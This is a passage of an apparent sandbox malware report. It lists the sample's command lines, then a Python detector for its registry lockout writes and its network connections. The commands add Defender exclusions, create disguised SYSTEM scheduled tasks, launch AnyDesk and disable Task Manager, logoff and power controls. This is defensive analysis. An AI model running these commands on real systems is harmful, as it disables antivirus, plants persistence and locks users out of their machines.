C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/conhost.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c Copy-Item "c:/users/Admin/downloads/Anydesk.exe" -Destination "C:\ProgramData" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/stn.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/svchost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/Anydesk.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -c rm "c:/users/Admin/downloads/conhost.exe" -r -force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/stn.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/conhost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionProcess "C:\ProgramData/Anydesk.exe"

C:\Windows\system32\schtasks.exe

schtasks /Create /TN SystemTaskNavigator /TR "C:\ProgramData/stn.exe" /RL highest /SC ONLOGON /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftEdgeUpdateTaskList /TR "C:\ProgramData/Anydesk.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN OneDriveTaskReport /TR "C:\ProgramData/svchost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\schtasks.exe

schtasks /Create /TN MicrosoftUpdateScheduler /TR "C:\ProgramData/conhost.exe" /RL highest /SC ONLOGON /RU SYSTEM /F

C:\Windows\system32\timeout.exe

timeout /T 2 /NOBREAK

C:\ProgramData\AnyDesk.exe

"C:\ProgramData/Anydesk.exe" --start

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Roaming\enc1.mp3"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1064 CREDAT:537611 /prefetch:2

C:\Users\Admin\AppData\Roaming\locked.exe

"C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D65.tmp\4D66.tmp\4D67.bat C:\Users\Admin\AppData\Roaming\locked.exe"

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell2.ahk

C:\Windows\system32\timeout.exe

timeout /t 5 /nobreak

C:\Users\Admin\AppData\Roaming\AutoHotkeyU64.exe

C:\Users\Admin\AppData\Roaming/AutoHotkeyU64.exe C:\Users\Admin\AppData\Roaming/doorbell.ahk
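
The fifteen reg.exe writes above are one procedure: between them they remove the usual routes an interactive user has to end or escape the session (Task Manager, Log Off, Shut Down, Lock, the Ctrl+Alt+Del password change, the Start-menu power controls and fast user switching), which is why the report's "Disables Task Manager via registry modification" signature is only the visible corner of the behaviour. The Python below is an added example, not sandbox output or code from the sample: it parses `reg add` command lines of the form shown, classifies each write, and treats a burst of several such writes as the lockout pattern. The reason strings, the three-hit threshold, and the benign control lines are assumptions; the report lines are copied verbatim.

```python
# Added example for this report (not sandbox output or sample code): parse the
# reg.exe command lines above and flag the burst of "no way out" policy writes.
import re
import shlex
from dataclasses import dataclass

# Short hive names reg.exe accepts, mapped to canonical form (subset: assumption).
HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKEY_CURRENT_USER": "HKEY_CURRENT_USER",
         "HKLM": "HKEY_LOCAL_MACHINE", "HKEY_LOCAL_MACHINE": "HKEY_LOCAL_MACHINE"}

# Policy values (lower-cased) under a ...\Policies\... key that each remove one
# way for the user to end or escape the session. Names come from the report lines.
ESCAPE_BLOCKERS = {
    "disabletaskmgr": "Task Manager disabled",
    "noclose": "Shut Down removed from Start menu",
    "nologoff": "Log Off removed from Start menu",
    "disablelockworkstation": "Lock Workstation disabled",
    "disablechangepassword": "Change Password (Ctrl+Alt+Del) disabled",
    "hidepoweroptions": "power options hidden",
    "hidefastuserswitching": "Fast User Switching hidden",
}
# HKLM\SOFTWARE\Microsoft\PolicyManager\default\Start\Hide* with DWORD "value"=1
# hides that Start-menu control.
START_HIDE = re.compile(r"policymanager\\default\\start\\(hide\w+)$")


@dataclass
class RegAdd:
    hive: str       # canonical hive name
    path: str       # key path below the hive, lower-cased for matching
    value: str      # /v name ("" when absent)
    reg_type: str   # /t type; reg.exe defaults to REG_SZ
    data: str       # /d payload as a string


def parse_reg_add(cmdline):
    """Return a RegAdd for a `reg add ...` command line, or None for anything else."""
    # posix=False keeps backslashes literal; surrounding quotes are stripped here.
    toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if len(toks) < 3 or toks[1].lower() != "add":
        return None
    if toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    hive, _, path = toks[2].partition("\\")
    if hive.upper() not in HIVES:
        return None
    opts, i = {}, 3
    while i < len(toks):
        flag = toks[i].lower()
        if flag in ("/v", "/t", "/d") and i + 1 < len(toks):
            opts[flag] = toks[i + 1]
            i += 2
        else:                       # /f, /ve, /reg:32 ... carry nothing we need
            i += 1
    return RegAdd(HIVES[hive.upper()], path.lower(), opts.get("/v", ""),
                  opts.get("/t", "REG_SZ"), opts.get("/d", ""))


def classify(entry):
    """Reason text if this write blocks a user escape route, else None.

    Only DWORD 1 counts: the same value written as 0 re-enables the control.
    """
    if entry.reg_type.upper() != "REG_DWORD" or entry.data != "1":
        return None
    name = entry.value.lower()
    if "\\policies\\" in entry.path and name in ESCAPE_BLOCKERS:
        return ESCAPE_BLOCKERS[name]
    m = START_HIDE.search(entry.path)
    if m and name == "value":
        return "Start menu control hidden: " + m.group(1)
    return None


def assess(cmdlines, threshold=3):
    """Collect hits for every command line and give a verdict.

    A lone DisableTaskMgr write is an everyday admin action, so the verdict
    needs `threshold` blockers in the same batch (the cutoff is an assumption).
    """
    hits = []
    for line in cmdlines:
        entry = parse_reg_add(line)
        reason = classify(entry) if entry else None
        if reason:
            hits.append((entry.hive, entry.path, entry.value, reason))
    return {"hits": hits, "lockout": len(hits) >= threshold}


# Command lines copied from the report above (raw strings keep the backslashes).
REPORT_CMDLINES = [
    r"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f",
    r"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f",
    r"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f",
    r"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f",
    r"REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideShutDown /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideHibernate /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideLock /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HidePowerButton /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideRestart /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSleep /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSwitchAccount /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Start\HideSignOut /v value /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HidePowerOptions /t REG_DWORD /d 1 /f",
    r"reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f",
]

# Constructed controls: the cmd.exe launcher from the report (not a reg add),
# an unrelated key, and a write that re-enables Task Manager.
BENIGN_CMDLINES = [
    r'"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4D65.tmp\4D66.tmp\4D67.bat C:\Users\Admin\AppData\Roaming\locked.exe"',
    r"reg add HKCU\Software\ExampleVendor\App /v Theme /t REG_SZ /d dark /f",
    r"reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f",
]

if __name__ == "__main__":
    result = assess(REPORT_CMDLINES + BENIGN_CMDLINES)
    for hive, path, value, reason in result["hits"]:
        print(f"{hive}\\{path} [{value}] -> {reason}")
    print("interactive lockout:", result["lockout"])
```

The parser takes the CommandLine field of any process-creation record (Sysmon event 1, Security event 4688) unchanged, so the same logic runs over live telemetry as over this report; matching on the parsed key and value rather than on the raw string means the HKCU/HKEY_CURRENT_USER spelling and upper/lower-case REG ADD variants seen above all collapse to one rule.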

Network

Country Destination Domain Proto
US 8.8.8.8:53 boot.net.anydesk.com udp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 relay-d4aa0625.net.anydesk.com udp
GB 57.128.141.164:443 relay-d4aa0625.net.anydesk.com tcp
DE 49.12.130.236:443 boot.net.anydesk.com tcp
US 8.8.8.8:53 ctt.ac udp
US 134.209.68.5:443 ctt.ac tcp
US 134.209.68.5:443 ctt.ac tcp
US 8.8.8.8:53 clicktotweet.com udp
US 134.209.68.5:443 clicktotweet.com tcp
US 134.209.68.5:443 clicktotweet.com tcp
US 8.8.8.8:53 relay-ad195ac5.net.anydesk.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
GB 57.128.141.163:443 relay-ad195ac5.net.anydesk.com tcp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
BE 64.233.167.157:443 stats.g.doubleclick.net tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.1:443 twitter.com tcp
US 104.244.42.1:443 twitter.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:20001 udp
N/A 239.255.102.18:10810 udp
N/A 239.255.102.18:25830 udp
N/A 239.255.102.18:26112 udp
N/A 239.255.102.18:25149 udp
N/A 239.255.102.18:62977 udp
N/A 239.255.102.18:36142 udp
N/A 239.255.102.18:55586 udp
N/A 239.255.102.18:44143 udp
N/A 239.255.102.18:10296 udp
N/A 239.255.102.18:56456 udp
N/A 239.255.102.18:52980 udp
N/A 239.255.102.18:21155 udp
N/A 239.255.102.18:61452 udp
N/A 239.255.102.18:21298 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:45624 udp
N/A 239.255.102.18:38395 udp
N/A 239.255.102.18:62185 udp
N/A 239.255.102.18:56688 udp
N/A 239.255.102.18:45492 udp
N/A 239.255.102.18:486 udp
N/A 239.255.102.18:51771 udp
N/A 239.255.102.18:46409 udp
N/A 239.255.102.18:59788 udp
N/A 239.255.102.18:48667 udp
N/A 239.255.102.18:55503 udp
N/A 239.255.102.18:41705 udp
N/A 239.255.102.18:44565 udp
N/A 239.255.102.18:64446 udp
N/A 239.255.102.18:38749 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:19369 udp
N/A 239.255.102.18:43099 udp
N/A 239.255.102.18:11206 udp
N/A 239.255.102.18:60064 udp
N/A 239.255.102.18:55852 udp
N/A 239.255.102.18:57187 udp
N/A 239.255.102.18:51265 udp
N/A 239.255.102.18:4552 udp
N/A 239.255.102.18:8778 udp
N/A 239.255.102.18:47290 udp
US 104.244.42.1:443 twitter.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:28266 udp
N/A 239.255.102.18:38384 udp
N/A 239.255.102.18:11763 udp
N/A 239.255.102.18:24580 udp
N/A 239.255.102.18:319 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:853 udp
N/A 239.255.102.18:22296 udp
N/A 239.255.102.18:50605 udp
N/A 239.255.102.18:59456 udp
N/A 239.255.102.18:58819 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:25558 udp
N/A 239.255.102.18:39581 udp
N/A 239.255.102.18:60413 udp
N/A 239.255.102.18:40569 udp
N/A 239.255.102.18:53658 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:61947 udp
N/A 239.255.102.18:42999 udp
N/A 239.255.102.18:33490 udp
N/A 239.255.102.18:21645 udp
N/A 239.255.102.18:56528 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:44802 udp
N/A 239.255.102.18:13547 udp
N/A 239.255.102.18:37376 udp
N/A 239.255.102.18:48472 udp
N/A 239.255.102.18:36225 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:27047 udp
N/A 239.255.102.18:62609 udp
N/A 239.255.102.18:59297 udp
N/A 239.255.102.18:60884 udp
N/A 239.255.102.18:62567 udp
US 8.8.8.8:53 spankbang.com udp
US 8.8.8.8:53 spankbang.com udp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 8.8.8.8:53 api.playanext.com udp
GB 18.245.187.82:80 api.playanext.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 104.19.130.98:443 spankbang.com tcp
US 8.8.8.8:53 tb.sb-cd.com udp
US 8.8.8.8:53 hls-uranus.sb-cd.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 c.ptgncdn.com udp
US 8.8.8.8:53 deliver.ptgncdn.com udp
US 8.8.8.8:53 assets.sb-cd.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:24510 udp
N/A 239.255.102.18:64599 udp
N/A 239.255.102.18:15520 udp
N/A 239.255.102.18:2184 udp
N/A 239.255.102.18:5587 udp
N/A 239.255.102.18:49850 udp
N/A 239.255.102.18:7749 udp
N/A 239.255.102.18:25564 udp
N/A 239.255.102.18:38870 udp
N/A 239.255.102.18:13918 udp
N/A 239.255.102.18:3447 udp
N/A 239.255.102.18:36276 udp
N/A 239.255.102.18:40100 udp
N/A 239.255.102.18:19410 udp
N/A 239.255.102.18:9735 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:1279 udp
N/A 239.255.102.18:64354 udp
N/A 239.255.102.18:38725 udp
N/A 239.255.102.18:6665 udp
N/A 239.255.102.18:8207 udp
N/A 239.255.102.18:51741 udp
N/A 239.255.102.18:21497 udp
N/A 239.255.102.18:27055 udp
N/A 239.255.102.18:49700 udp
N/A 239.255.102.18:14762 udp
N/A 239.255.102.18:34392 udp
N/A 239.255.102.18:61015 udp
N/A 239.255.102.18:64695 udp
N/A 239.255.102.18:63830 udp
N/A 239.255.102.18:51588 udp
N/A 239.255.102.18:55614 udp
N/A 239.255.102.18:44671 udp
N/A 239.255.102.18:65330 udp
N/A 239.255.102.18:7621 udp
N/A 239.255.102.18:26820 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:9250 udp
N/A 239.255.102.18:12279 udp
N/A 239.255.102.18:32267 udp
N/A 239.255.102.18:12002 udp
N/A 239.255.102.18:20437 udp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.18.33.166:443 deliver.ptgncdn.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 104.16.80.73:443 static.cloudflareinsights.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.16.4.5:443 assets.sb-cd.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
US 8.8.8.8:53 flagb93361.spankbang.com udp
US 104.19.131.98:443 flagb93361.spankbang.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 8.8.8.8:53 creative.xlviirdr.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 104.18.40.50:443 creative.xlviirdr.com tcp
US 104.18.40.50:443 creative.xlviirdr.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:24615 udp
N/A 239.255.102.18:21521 udp
N/A 239.255.102.18:1628 udp
N/A 239.255.102.18:13515 udp
N/A 239.255.102.18:63931 udp
N/A 239.255.102.18:64497 udp
N/A 239.255.102.18:10876 udp
N/A 239.255.102.18:13005 udp
N/A 239.255.102.18:8546 udp
N/A 239.255.102.18:63082 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:36176 udp
N/A 239.255.102.18:64864 udp
N/A 239.255.102.18:45802 udp
N/A 239.255.102.18:9958 udp
N/A 239.255.102.18:29095 udp
N/A 239.255.102.18:62585 udp
N/A 239.255.102.18:20894 udp
N/A 239.255.102.18:49123 udp
N/A 239.255.102.18:47244 udp
N/A 239.255.102.18:36151 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:42587 udp
N/A 239.255.102.18:43311 udp
N/A 239.255.102.18:1596 udp
N/A 239.255.102.18:59489 udp
N/A 239.255.102.18:16460 udp
N/A 239.255.102.18:8860 udp
N/A 239.255.102.18:43866 udp
N/A 239.255.102.18:2015 udp
N/A 239.255.102.18:17514 udp
N/A 239.255.102.18:37388 udp
US 8.8.8.8:53 go.xlviirdr.com udp
US 8.8.8.8:53 video.ktkjmp.com udp
US 172.64.147.206:443 go.xlviirdr.com tcp
US 104.18.48.21:443 video.ktkjmp.com tcp
US 104.18.48.21:443 video.ktkjmp.com tcp
US 172.64.147.206:443 go.xlviirdr.com tcp
US 8.8.8.8:53 img.strpst.com udp
US 104.17.11.106:443 img.strpst.com tcp
US 104.17.11.106:443 img.strpst.com tcp
US 8.8.8.8:53 go.xxxviiijmp.com udp
US 104.18.40.50:443 go.xxxviiijmp.com tcp
US 104.18.40.50:443 go.xxxviiijmp.com tcp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:23767 udp
N/A 239.255.102.18:27910 udp
N/A 239.255.102.18:30462 udp
N/A 239.255.102.18:27440 udp
N/A 239.255.102.18:58578 udp
N/A 239.255.102.18:19282 udp
N/A 239.255.102.18:33753 udp
N/A 239.255.102.18:43732 udp
N/A 239.255.102.18:24016 udp
N/A 239.255.102.18:18719 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:3880 udp
N/A 239.255.102.18:46706 udp
N/A 239.255.102.18:14899 udp
N/A 239.255.102.18:24722 udp
N/A 239.255.102.18:49528 udp
N/A 239.255.102.18:34678 udp
N/A 239.255.102.18:63517 udp
N/A 239.255.102.18:41669 udp
N/A 239.255.102.18:65345 udp
N/A 239.255.102.18:43672 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:23005 udp
N/A 239.255.102.18:41228 udp
N/A 239.255.102.18:52111 udp
N/A 239.255.102.18:23710 udp
N/A 239.255.102.18:46702 udp
N/A 239.255.102.18:37332 udp
N/A 239.255.102.18:15142 udp
N/A 239.255.102.18:28504 udp
N/A 239.255.102.18:54227 udp
N/A 239.255.102.18:44942 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:49318 udp
N/A 239.255.102.18:17726 udp
N/A 239.255.102.18:22026 udp
N/A 239.255.102.18:10297 udp
N/A 239.255.102.18:33010 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:48621 udp
N/A 239.255.102.18:5605 udp
N/A 239.255.102.18:16072 udp
N/A 239.255.102.18:53531 udp
N/A 239.255.102.18:27204 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:20684 udp
N/A 239.255.102.18:400 udp
N/A 239.255.102.18:53587 udp
N/A 239.255.102.18:9340 udp
N/A 239.255.102.18:34368 udp
N/A 239.255.102.18:9338 udp
N/A 239.255.102.18:40979 udp
N/A 239.255.102.18:59778 udp
N/A 239.255.102.18:22646 udp
N/A 239.255.102.18:21096 udp
N/A 239.255.102.18:21672 udp
N/A 239.255.102.18:16311 udp
N/A 239.255.102.18:15476 udp
N/A 239.255.102.18:59530 udp
N/A 239.255.102.18:33540 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:1614 udp
N/A 239.255.102.18:34897 udp
N/A 239.255.102.18:29230 udp
N/A 239.255.102.18:57242 udp
N/A 239.255.102.18:21804 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:48971 udp
N/A 239.255.102.18:49475 udp
N/A 239.255.102.18:27340 udp
N/A 239.255.102.18:16193 udp
N/A 239.255.102.18:27804 udp
N/A 239.255.102.18:12503 udp
N/A 239.255.102.18:24085 udp
N/A 239.255.102.18:34632 udp
N/A 239.255.102.18:50398 udp
N/A 239.255.102.18:31606 udp
N/A 239.255.102.18:27611 udp
N/A 239.255.102.18:64958 udp
N/A 239.255.102.18:18628 udp
N/A 239.255.102.18:17643 udp
N/A 239.255.102.18:59884 udp
N/A 239.255.102.18:32326 udp
N/A 239.255.102.18:19006 udp
N/A 239.255.102.18:40293 udp
N/A 239.255.102.18:56018 udp
N/A 239.255.102.18:10154 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:64144 udp
N/A 239.255.102.18:10804 udp
N/A 239.255.102.18:50882 udp
N/A 239.255.102.18:61897 udp
N/A 239.255.102.18:38690 udp
N/A 239.255.102.18:49171 udp
N/A 239.255.102.18:58160 udp
N/A 239.255.102.18:28342 udp
N/A 239.255.102.18:15329 udp
N/A 239.255.102.18:58295 udp
N/A 239.255.102.18:6982 udp
N/A 239.255.102.18:23476 udp
N/A 239.255.102.18:37755 udp
N/A 239.255.102.18:38980 udp
N/A 239.255.102.18:10135 udp
N/A 239.255.102.18:29860 udp
N/A 239.255.102.18:445 udp
N/A 239.255.102.18:40119 udp
N/A 239.255.102.18:12089 udp
N/A 239.255.102.18:15898 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:38993 udp
N/A 239.255.102.18:26014 udp
N/A 239.255.102.18:26352 udp
N/A 239.255.102.18:64609 udp
N/A 239.255.102.18:22818 udp
N/A 239.255.102.18:5009 udp
N/A 239.255.102.18:10497 udp
N/A 239.255.102.18:31142 udp
N/A 239.255.102.18:56231 udp
N/A 239.255.102.18:20173 udp
N/A 239.255.102.18:53569 udp
N/A 239.255.102.18:49187 udp
N/A 239.255.102.18:31221 udp
N/A 239.255.102.18:977 udp
N/A 239.255.102.18:45810 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:45810 udp
N/A 239.255.102.18:59339 udp
N/A 239.255.102.18:12052 udp
N/A 239.255.102.18:3940 udp
N/A 239.255.102.18:16498 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:44734 udp
N/A 239.255.102.18:54375 udp
N/A 239.255.102.18:13591 udp
N/A 239.255.102.18:49141 udp
N/A 239.255.102.18:57599 udp
N/A 239.255.102.18:50001 udp
N/A 239.255.102.18:57389 udp
N/A 239.255.102.18:53076 udp
N/A 239.255.102.18:26191 udp
N/A 239.255.102.18:14215 udp
N/A 239.255.102.18:9652 udp
N/A 239.255.102.18:14482 udp
N/A 239.255.102.18:55881 udp
N/A 239.255.102.18:29977 udp
N/A 239.255.102.18:51315 udp
N/A 239.255.102.18:33111 udp
N/A 239.255.102.18:43405 udp
N/A 239.255.102.18:24106 udp
N/A 239.255.102.18:30216 udp
N/A 239.255.102.18:21982 udp
N/A 239.255.102.18:41917 udp
N/A 239.255.102.18:50002 udp
N/A 239.255.102.18:49101 udp
N/A 239.255.102.18:63288 udp
N/A 239.255.102.18:10201 udp
N/A 239.255.102.18:57603 udp
N/A 239.255.102.18:45963 udp
N/A 239.255.102.18:7281 udp
N/A 239.255.102.18:25487 udp
N/A 239.255.102.18:12530 udp
N/A 239.255.102.18:52326 udp
N/A 239.255.102.18:23033 udp
N/A 239.255.102.18:50003 udp
N/A 239.255.102.18:43015 udp
N/A 239.255.102.18:6538 udp
N/A 239.255.102.18:24990 udp
N/A 239.255.102.18:26541 udp
N/A 239.255.102.18:27845 udp
N/A 239.255.102.18:46687 udp
N/A 239.255.102.18:21983 udp
N/A 239.255.102.18:40618 udp
N/A 239.255.102.18:3831 udp
N/A 239.255.102.18:8743 udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
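
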